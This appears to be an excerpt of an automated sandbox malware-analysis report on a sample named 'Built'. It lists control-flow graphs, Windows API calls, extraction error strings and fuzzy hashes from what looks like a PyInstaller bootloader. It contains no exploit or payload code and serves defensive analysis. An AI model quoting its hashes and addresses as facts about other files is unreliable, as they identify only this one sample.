                                                                      • Opcode Fuzzy Hash: 6fe09687227c44a11a2aea52fbca8833870d003cb7aa0180f1ca23ffa5452ddf
                                                                      • Instruction Fuzzy Hash: 86719171A2C686C5EB20BB14D4506B9A3A1EB58788F845039ED8D47F9BFE2CE5448F70

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 245 7ff76d5c15c0-7ff76d5c15d1 246 7ff76d5c15d3-7ff76d5c15dc call 7ff76d5c1050 245->246 247 7ff76d5c15f7-7ff76d5c1611 call 7ff76d5c3f70 245->247 252 7ff76d5c15ee-7ff76d5c15f6 246->252 253 7ff76d5c15de-7ff76d5c15e9 call 7ff76d5c25f0 246->253 254 7ff76d5c1613-7ff76d5c163a call 7ff76d5c2760 247->254 255 7ff76d5c163b-7ff76d5c1655 call 7ff76d5c3f70 247->255 253->252 261 7ff76d5c1671-7ff76d5c1688 call 7ff76d5cf9f4 255->261 262 7ff76d5c1657-7ff76d5c166c call 7ff76d5c25f0 255->262 268 7ff76d5c168a-7ff76d5c16a6 call 7ff76d5c2760 261->268 269 7ff76d5c16ab-7ff76d5c16af 261->269 267 7ff76d5c17c5-7ff76d5c17c8 call 7ff76d5cf36c 262->267 276 7ff76d5c17cd-7ff76d5c17df 267->276 280 7ff76d5c17bd-7ff76d5c17c0 call 7ff76d5cf36c 268->280 272 7ff76d5c16b1-7ff76d5c16bd call 7ff76d5c11f0 269->272 273 7ff76d5c16c9-7ff76d5c16e9 call 7ff76d5d4170 269->273 278 7ff76d5c16c2-7ff76d5c16c4 272->278 281 7ff76d5c170c-7ff76d5c1717 273->281 282 7ff76d5c16eb-7ff76d5c1707 call 7ff76d5c2760 273->282 278->280 280->267 285 7ff76d5c17a6-7ff76d5c17ae call 7ff76d5d415c 281->285 286 7ff76d5c171d-7ff76d5c1726 281->286 290 7ff76d5c17b3-7ff76d5c17b8 282->290 285->290 289 7ff76d5c1730-7ff76d5c1752 call 7ff76d5cf6bc 286->289 294 7ff76d5c1785-7ff76d5c178c 289->294 295 7ff76d5c1754-7ff76d5c176c call 7ff76d5cfdfc 289->295 290->280 296 7ff76d5c1793-7ff76d5c179c call 7ff76d5c2760 294->296 301 7ff76d5c1775-7ff76d5c1783 295->301 302 7ff76d5c176e-7ff76d5c1771 295->302 304 7ff76d5c17a1 296->304 301->296 302->289 303 7ff76d5c1773 302->303 303->304 304->285
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2075120548.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true
                                                                      • Associated: 00000001.00000002.2074977226.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2075201353.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2076543558.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2076543558.00007FF76D604000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2077563289.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff76d5c0000_Built.jbxd
                                                                      Similarity
                                                                      • API ID: Message
                                                                      • String ID: Failed to create symbolic link %s!$Failed to extract %s: failed to allocate temporary buffer!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to open target file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$Failed to extract %s: failed to write data chunk!$fopen$fread$fseek$fwrite$malloc
                                                                      • API String ID: 2030045667-1550345328
                                                                      • Opcode ID: 2c3af65fb8522519536d07b6bbe2d4d966547a78dc6b9025643caf232311552d
                                                                      • Instruction ID: 134f155b7ec8cdd1af335565368b3dc9593892fbddf6f13be953dd8d6c6e7f36
                                                                      • Opcode Fuzzy Hash: 2c3af65fb8522519536d07b6bbe2d4d966547a78dc6b9025643caf232311552d
                                                                      • Instruction Fuzzy Hash: 6C517A61B2C643D2EA10BB25A9505B9A3A0BF48B94FC44139ED1D47F97FE3CE5548B30

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2075120548.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true
                                                                      • Associated: 00000001.00000002.2074977226.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2075201353.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2076543558.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2076543558.00007FF76D604000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2077563289.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff76d5c0000_Built.jbxd
                                                                      Similarity
                                                                      • API ID: Process_invalid_parameter_noinfo$ByteCharCodeCommandConsoleCreateCtrlExitHandlerInfoLineMultiObjectSingleStartupWaitWide
                                                                      • String ID: CreateProcessW$Failed to create child process!
                                                                      • API String ID: 2895956056-699529898
                                                                      • Opcode ID: 2d8580ce5d81a01d0f8683f73fef31206a84e7faf833a053d17f215ed92b6c27
                                                                      • Instruction ID: 5c95ef3233acb4006b4c4665c0adfba61d3624a43145cedb2713642687650bb7
                                                                      • Opcode Fuzzy Hash: 2d8580ce5d81a01d0f8683f73fef31206a84e7faf833a053d17f215ed92b6c27
                                                                      • Instruction Fuzzy Hash: 7B410431A1C781C1DB20BB24F4552AAB3A1FB89364F900335E9AD47BD6EF7CD0458B60

                                                                      Control-flow Graph

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2075120548.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true
                                                                      • Associated: 00000001.00000002.2074977226.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2075201353.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2076543558.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2076543558.00007FF76D604000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2077563289.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff76d5c0000_Built.jbxd
                                                                      Similarity
                                                                      • API ID: Message
                                                                      • String ID: 1.3.1$Failed to extract %s: decompression resulted in return code %d!$Failed to extract %s: failed to allocate temporary input buffer!$Failed to extract %s: failed to allocate temporary output buffer!$Failed to extract %s: inflateInit() failed with return code %d!$malloc
                                                                      • API String ID: 2030045667-2813020118
                                                                      • Opcode ID: a3629aa16b2bf4226d63d046932eab8e2b7a9c7a4f48f2e716c054c0a2a071a0
                                                                      • Instruction ID: 287f446f9f77c864851de44c49c444a1c6a98fe4868331a5d6f310da19a87954
                                                                      • Opcode Fuzzy Hash: a3629aa16b2bf4226d63d046932eab8e2b7a9c7a4f48f2e716c054c0a2a071a0
                                                                      • Instruction Fuzzy Hash: EB51B462A2CA42C1EA60BB16A4507BAA291BF45798F844139DD4D47FD7FE3CE541CB30

                                                                      Control-flow Graph

                                                                      APIs
                                                                      • FreeLibrary.KERNEL32(?,?,?,00007FF76D5DE3BA,?,?,-00000018,00007FF76D5DA063,?,?,?,00007FF76D5D9F5A,?,?,?,00007FF76D5D524E), ref: 00007FF76D5DE19C
                                                                      • GetProcAddress.KERNEL32(?,?,?,00007FF76D5DE3BA,?,?,-00000018,00007FF76D5DA063,?,?,?,00007FF76D5D9F5A,?,?,?,00007FF76D5D524E), ref: 00007FF76D5DE1A8
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2075120548.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true
                                                                      • Associated: 00000001.00000002.2074977226.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2075201353.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2076543558.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2076543558.00007FF76D604000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2077563289.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff76d5c0000_Built.jbxd
                                                                      Similarity
                                                                      • API ID: AddressFreeLibraryProc
                                                                      • String ID: api-ms-$ext-ms-
                                                                      • API String ID: 3013587201-537541572
                                                                      • Opcode ID: 400d167c79677b3a1b331b2dd1a2c4ed1cd7dec94f3cf9f9612a621c3bffedbb
                                                                      • Instruction ID: f2893d0b71bf94a64afa05ebb4aa7950cd02e9e61dca5ef5c7578f6153641722
                                                                      • Opcode Fuzzy Hash: 400d167c79677b3a1b331b2dd1a2c4ed1cd7dec94f3cf9f9612a621c3bffedbb
                                                                      • Instruction Fuzzy Hash: DC41C331B2D602C1FA16FB16A8106B5E292BF45BA0F894135DD6D97B86FE3CE405C234

                                                                      Control-flow Graph

                                                                      APIs
                                                                      • GetTempPathW.KERNEL32(?,?,FFFFFFFF,00007FF76D5C3834), ref: 00007FF76D5C7CE4
                                                                      • CreateDirectoryW.KERNELBASE(?,?,FFFFFFFF,00007FF76D5C3834), ref: 00007FF76D5C7D2C
                                                                        • Part of subcall function 00007FF76D5C7E10: GetEnvironmentVariableW.KERNEL32(00007FF76D5C365F), ref: 00007FF76D5C7E47
                                                                        • Part of subcall function 00007FF76D5C7E10: ExpandEnvironmentStringsW.KERNEL32 ref: 00007FF76D5C7E69
                                                                        • Part of subcall function 00007FF76D5D7548: _invalid_parameter_noinfo.LIBCMT ref: 00007FF76D5D7561
                                                                        • Part of subcall function 00007FF76D5C26C0: MessageBoxW.USER32 ref: 00007FF76D5C2736
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2075120548.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true
                                                                      • Associated: 00000001.00000002.2074977226.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2075201353.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2076543558.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2076543558.00007FF76D604000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2077563289.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff76d5c0000_Built.jbxd
                                                                      Similarity
                                                                      • API ID: Environment$CreateDirectoryExpandMessagePathStringsTempVariable_invalid_parameter_noinfo
                                                                      • String ID: LOADER: failed to set the TMP environment variable.$LOADER: length of teporary directory path exceeds maximum path length!$TMP$TMP$_MEI%d
                                                                      • API String ID: 740614611-1339014028
                                                                      • Opcode ID: 11860e683bfeec2df00dcc2c56da5dbb6591d5702bb717516bbb2bb41ff9b0e3
                                                                      • Instruction ID: 7c0004b7c7c841ee3bd77a572f202ef4d75feee4cc4491f1e2f6653cabc14b15
                                                                      • Opcode Fuzzy Hash: 11860e683bfeec2df00dcc2c56da5dbb6591d5702bb717516bbb2bb41ff9b0e3
                                                                      • Instruction Fuzzy Hash: 7C418011E2D642C1EA20BB6199652F99261AF997C0FC41036ED2D47F97FE3CE5058B70

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 572 7ff76d5dad6c-7ff76d5dad92 573 7ff76d5dad94-7ff76d5dada8 call 7ff76d5d43d4 call 7ff76d5d43f4 572->573 574 7ff76d5dadad-7ff76d5dadb1 572->574 590 7ff76d5db19e 573->590 576 7ff76d5db187-7ff76d5db193 call 7ff76d5d43d4 call 7ff76d5d43f4 574->576 577 7ff76d5dadb7-7ff76d5dadbe 574->577 593 7ff76d5db199 call 7ff76d5d9bf0 576->593 577->576 579 7ff76d5dadc4-7ff76d5dadf2 577->579 579->576 582 7ff76d5dadf8-7ff76d5dadff 579->582 585 7ff76d5dae01-7ff76d5dae13 call 7ff76d5d43d4 call 7ff76d5d43f4 582->585 586 7ff76d5dae18-7ff76d5dae1b 582->586 585->593 588 7ff76d5db183-7ff76d5db185 586->588 589 7ff76d5dae21-7ff76d5dae27 586->589 594 7ff76d5db1a1-7ff76d5db1b8 588->594 589->588 595 7ff76d5dae2d-7ff76d5dae30 589->595 590->594 593->590 595->585 599 7ff76d5dae32-7ff76d5dae57 595->599 601 7ff76d5dae8a-7ff76d5dae91 599->601 602 7ff76d5dae59-7ff76d5dae5b 599->602 603 7ff76d5dae93-7ff76d5daebb call 7ff76d5dc90c call 7ff76d5d9c58 * 2 601->603 604 7ff76d5dae66-7ff76d5dae7d call 7ff76d5d43d4 call 7ff76d5d43f4 call 7ff76d5d9bf0 601->604 605 7ff76d5dae82-7ff76d5dae88 602->605 606 7ff76d5dae5d-7ff76d5dae64 602->606 633 7ff76d5daebd-7ff76d5daed3 call 7ff76d5d43f4 call 7ff76d5d43d4 603->633 634 7ff76d5daed8-7ff76d5daf03 call 7ff76d5db594 603->634 638 7ff76d5db010 604->638 607 7ff76d5daf08-7ff76d5daf1f 605->607 606->604 606->605 610 7ff76d5daf21-7ff76d5daf29 607->610 611 7ff76d5daf9a-7ff76d5dafa4 call 7ff76d5e2c2c 607->611 610->611 614 7ff76d5daf2b-7ff76d5daf2d 610->614 624 7ff76d5db02e 611->624 625 7ff76d5dafaa-7ff76d5dafbf 611->625 614->611 618 7ff76d5daf2f-7ff76d5daf45 614->618 618->611 622 7ff76d5daf47-7ff76d5daf53 618->622 622->611 627 7ff76d5daf55-7ff76d5daf57 622->627 629 7ff76d5db033-7ff76d5db053 ReadFile 624->629 625->624 630 7ff76d5dafc1-7ff76d5dafd3 GetConsoleMode 625->630 627->611 632 7ff76d5daf59-7ff76d5daf71 627->632 635 7ff76d5db14d-7ff76d5db156 GetLastError 629->635 636 7ff76d5db059-7ff76d5db061 629->636 630->624 637 7ff76d5dafd5-7ff76d5dafdd 630->637 632->611 643 7ff76d5daf73-7ff76d5daf7f 632->643 633->638 634->607 640 7ff76d5db173-7ff76d5db176 635->640 641 7ff76d5db158-7ff76d5db16e call 7ff76d5d43f4 call 7ff76d5d43d4 635->641 636->635 645 7ff76d5db067 636->645 637->629 639 7ff76d5dafdf-7ff76d5db001 ReadConsoleW 637->639 642 7ff76d5db013-7ff76d5db01d call 7ff76d5d9c58 638->642 647 7ff76d5db003 GetLastError 639->647 648 7ff76d5db022-7ff76d5db02c 639->648 652 7ff76d5db17c-7ff76d5db17e 640->652 653 7ff76d5db009-7ff76d5db00b call 7ff76d5d4368 640->653 641->638 642->594 643->611 651 7ff76d5daf81-7ff76d5daf83 643->651 655 7ff76d5db06e-7ff76d5db083 645->655 647->653 648->655 651->611 660 7ff76d5daf85-7ff76d5daf95 651->660 652->642 653->638 655->642 662 7ff76d5db085-7ff76d5db090 655->662 660->611 665 7ff76d5db092-7ff76d5db0ab call 7ff76d5da984 662->665 666 7ff76d5db0b7-7ff76d5db0bf 662->666 672 7ff76d5db0b0-7ff76d5db0b2 665->672 668 7ff76d5db0c1-7ff76d5db0d3 666->668 669 7ff76d5db13b-7ff76d5db148 call 7ff76d5da7c4 666->669 673 7ff76d5db0d5 668->673 674 7ff76d5db12e-7ff76d5db136 668->674 669->672 672->642 676 7ff76d5db0da-7ff76d5db0e1 673->676 674->642 677 7ff76d5db0e3-7ff76d5db0e7 676->677 678 7ff76d5db11d-7ff76d5db128 676->678 679 7ff76d5db103 677->679 680 7ff76d5db0e9-7ff76d5db0f0 677->680 678->674 682 7ff76d5db109-7ff76d5db119 679->682 680->679 681 7ff76d5db0f2-7ff76d5db0f6 680->681 681->679 683 7ff76d5db0f8-7ff76d5db101 681->683 682->676 684 7ff76d5db11b 682->684 683->682 684->674
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2075120548.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true
                                                                      • Associated: 00000001.00000002.2074977226.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2075201353.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2076543558.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2076543558.00007FF76D604000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2077563289.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff76d5c0000_Built.jbxd
                                                                      Similarity
                                                                      • API ID: _invalid_parameter_noinfo
                                                                      • String ID:
                                                                      • API String ID: 3215553584-0
                                                                      • Opcode ID: f46020de842a52cafdde7105f07d1b6eb91271a1123fdb72a25b984c7f5050ec
                                                                      • Instruction ID: aafb22e96dce284fa08566b45f0ed1a251ad769c013d0808e08d1a3ce162d628
                                                                      • Opcode Fuzzy Hash: f46020de842a52cafdde7105f07d1b6eb91271a1123fdb72a25b984c7f5050ec
                                                                      • Instruction Fuzzy Hash: B5C1E22292C787D1EB61BB5490206BEB761EB94BC0F950131DE6D03B93EE7CE4458338

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2075120548.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true
                                                                      • Associated: 00000001.00000002.2074977226.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2075201353.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2076543558.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2076543558.00007FF76D604000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2077563289.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff76d5c0000_Built.jbxd
                                                                      Similarity
                                                                      • API ID: Token$InformationProcess$CloseConvertCurrentErrorHandleLastOpenString
                                                                      • String ID:
                                                                      • API String ID: 995526605-0
                                                                      • Opcode ID: 748b97fd960fc4e5004671791fa0bd5d217265360f36ca399a643c65045a3ab9
                                                                      • Instruction ID: c6239d03bfcab29e8c8e1406a08318e42d2e3cc7d99674f6556714ee47cc68a3
                                                                      • Opcode Fuzzy Hash: 748b97fd960fc4e5004671791fa0bd5d217265360f36ca399a643c65045a3ab9
                                                                      • Instruction Fuzzy Hash: DC212121E1CB4382EB10BB55A44422AE7A1EB857A5F900639DE7D43ED6EF6CD4458B20

                                                                      Control-flow Graph

                                                                      APIs
                                                                      • GetModuleFileNameW.KERNEL32(?,00007FF76D5C3534), ref: 00007FF76D5C3411
                                                                        • Part of subcall function 00007FF76D5C29E0: GetLastError.KERNEL32(?,?,?,00007FF76D5C342E,?,00007FF76D5C3534), ref: 00007FF76D5C2A14
                                                                        • Part of subcall function 00007FF76D5C29E0: FormatMessageW.KERNEL32(?,?,?,00007FF76D5C342E), ref: 00007FF76D5C2A7D
                                                                        • Part of subcall function 00007FF76D5C29E0: MessageBoxW.USER32 ref: 00007FF76D5C2ACF
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2075120548.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true
                                                                      • Associated: 00000001.00000002.2074977226.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2075201353.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2076543558.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2076543558.00007FF76D604000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2077563289.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff76d5c0000_Built.jbxd
                                                                      Similarity
                                                                      • API ID: Message$ErrorFileFormatLastModuleName
                                                                      • String ID: Failed to convert executable path to UTF-8.$Failed to obtain executable path.$Failed to resolve full path to executable %ls.$GetModuleFileNameW$\\?\
                                                                      • API String ID: 517058245-2863816727
                                                                      • Opcode ID: 4333ea13b7f7892cb13c7834fe0fbc8b7cb0659b0560af6bfa7ef98de9a8054c
                                                                      • Instruction ID: 3e318591bf323d374e0c0ceccb56d2509de617ca72c216a2ffb406021f04854f
                                                                      • Opcode Fuzzy Hash: 4333ea13b7f7892cb13c7834fe0fbc8b7cb0659b0560af6bfa7ef98de9a8054c
                                                                      • Instruction Fuzzy Hash: A3215161B2C646D1FA21BB24E8553B9A250BF58395FC0013ADE6D86DE7FF2CE5048B30

                                                                      Control-flow Graph

                                                                      APIs
                                                                        • Part of subcall function 00007FF76D5C7B50: GetCurrentProcess.KERNEL32 ref: 00007FF76D5C7B70
                                                                        • Part of subcall function 00007FF76D5C7B50: OpenProcessToken.ADVAPI32 ref: 00007FF76D5C7B83
                                                                        • Part of subcall function 00007FF76D5C7B50: GetTokenInformation.KERNELBASE ref: 00007FF76D5C7BA8
                                                                        • Part of subcall function 00007FF76D5C7B50: GetLastError.KERNEL32 ref: 00007FF76D5C7BB2
                                                                        • Part of subcall function 00007FF76D5C7B50: GetTokenInformation.KERNELBASE ref: 00007FF76D5C7BF2
                                                                        • Part of subcall function 00007FF76D5C7B50: ConvertSidToStringSidW.ADVAPI32 ref: 00007FF76D5C7C0E
                                                                        • Part of subcall function 00007FF76D5C7B50: CloseHandle.KERNEL32 ref: 00007FF76D5C7C26
                                                                      • LocalFree.KERNEL32(?,00007FF76D5C3814), ref: 00007FF76D5C848C
                                                                      • LocalFree.KERNEL32(?,00007FF76D5C3814), ref: 00007FF76D5C8495
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2075120548.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true
                                                                      • Associated: 00000001.00000002.2074977226.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2075201353.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2076543558.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2076543558.00007FF76D604000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2077563289.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff76d5c0000_Built.jbxd
                                                                      Similarity
                                                                      • API ID: Token$FreeInformationLocalProcess$CloseConvertCurrentErrorHandleLastOpenString
                                                                      • String ID: D:(A;;FA;;;%s)$D:(A;;FA;;;%s)(A;;FA;;;%s)$S-1-3-4$Security descriptor string length exceeds PYI_PATH_MAX!
                                                                      • API String ID: 6828938-1529539262
                                                                      • Opcode ID: 66c7400c0f842d66862a6c7a5c7e226ffa5096460946b14aa4108adf3e2753a4
                                                                      • Instruction ID: 4e6e39f8fb2ee8cd2591a199544433e29ff7c5248a70f14e8b0feb9204e49fda
                                                                      • Opcode Fuzzy Hash: 66c7400c0f842d66862a6c7a5c7e226ffa5096460946b14aa4108adf3e2753a4
                                                                      • Instruction Fuzzy Hash: A1212C21A2C642C2E650BB10E4552EAA2A5FB88784FC4403AEE4D57B97EE3CD8458B70

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 819 7ff76d5dc270-7ff76d5dc295 820 7ff76d5dc563 819->820 821 7ff76d5dc29b-7ff76d5dc29e 819->821 822 7ff76d5dc565-7ff76d5dc575 820->822 823 7ff76d5dc2a0-7ff76d5dc2d2 call 7ff76d5d9b24 821->823 824 7ff76d5dc2d7-7ff76d5dc303 821->824 823->822 826 7ff76d5dc305-7ff76d5dc30c 824->826 827 7ff76d5dc30e-7ff76d5dc314 824->827 826->823 826->827 828 7ff76d5dc324-7ff76d5dc339 call 7ff76d5e2c2c 827->828 829 7ff76d5dc316-7ff76d5dc31f call 7ff76d5db630 827->829 834 7ff76d5dc453-7ff76d5dc45c 828->834 835 7ff76d5dc33f-7ff76d5dc348 828->835 829->828 836 7ff76d5dc4b0-7ff76d5dc4d5 WriteFile 834->836 837 7ff76d5dc45e-7ff76d5dc464 834->837 835->834 838 7ff76d5dc34e-7ff76d5dc352 835->838 839 7ff76d5dc4e0 836->839 840 7ff76d5dc4d7-7ff76d5dc4dd GetLastError 836->840 841 7ff76d5dc466-7ff76d5dc469 837->841 842 7ff76d5dc49c-7ff76d5dc4ae call 7ff76d5dbd28 837->842 843 7ff76d5dc354-7ff76d5dc35c call 7ff76d5d3ae0 838->843 844 7ff76d5dc363-7ff76d5dc36e 838->844 845 7ff76d5dc4e3 839->845 840->839 846 7ff76d5dc46b-7ff76d5dc46e 841->846 847 7ff76d5dc488-7ff76d5dc49a call 7ff76d5dbf48 841->847 860 7ff76d5dc440-7ff76d5dc447 842->860 843->844 849 7ff76d5dc370-7ff76d5dc379 844->849 850 7ff76d5dc37f-7ff76d5dc394 GetConsoleMode 844->850 852 7ff76d5dc4e8 845->852 853 7ff76d5dc4f4-7ff76d5dc4fe 846->853 854 7ff76d5dc474-7ff76d5dc486 call 7ff76d5dbe2c 846->854 847->860 849->834 849->850 857 7ff76d5dc44c 850->857 858 7ff76d5dc39a-7ff76d5dc3a0 850->858 861 7ff76d5dc4ed 852->861 862 7ff76d5dc500-7ff76d5dc505 853->862 863 7ff76d5dc55c-7ff76d5dc561 853->863 854->860 857->834 866 7ff76d5dc3a6-7ff76d5dc3a9 858->866 867 7ff76d5dc429-7ff76d5dc43b call 7ff76d5db8b0 858->867 860->852 861->853 871 7ff76d5dc533-7ff76d5dc53d 862->871 872 7ff76d5dc507-7ff76d5dc50a 862->872 863->822 868 7ff76d5dc3b4-7ff76d5dc3c2 866->868 869 7ff76d5dc3ab-7ff76d5dc3ae 866->869 867->860 876 7ff76d5dc3c4 868->876 877 7ff76d5dc420-7ff76d5dc424 868->877 869->861 869->868 874 7ff76d5dc544-7ff76d5dc553 871->874 875 7ff76d5dc53f-7ff76d5dc542 871->875 878 7ff76d5dc523-7ff76d5dc52e call 7ff76d5d43b0 872->878 879 7ff76d5dc50c-7ff76d5dc51b 872->879 874->863 875->820 875->874 880 7ff76d5dc3c8-7ff76d5dc3df call 7ff76d5e2cf8 876->880 877->845 878->871 879->878 885 7ff76d5dc3e1-7ff76d5dc3ed 880->885 886 7ff76d5dc417-7ff76d5dc41d GetLastError 880->886 887 7ff76d5dc3ef-7ff76d5dc401 call 7ff76d5e2cf8 885->887 888 7ff76d5dc40c-7ff76d5dc413 885->888 886->877 887->886 892 7ff76d5dc403-7ff76d5dc40a 887->892 888->877 890 7ff76d5dc415 888->890 890->880 892->888
                                                                      APIs
                                                                      • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF76D5DC25B), ref: 00007FF76D5DC38C
                                                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF76D5DC25B), ref: 00007FF76D5DC417
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2075120548.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true
                                                                      • Associated: 00000001.00000002.2074977226.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2075201353.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2076543558.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2076543558.00007FF76D604000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2077563289.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff76d5c0000_Built.jbxd
                                                                      Similarity
                                                                      • API ID: ConsoleErrorLastMode
                                                                      • String ID:
                                                                      • API String ID: 953036326-0
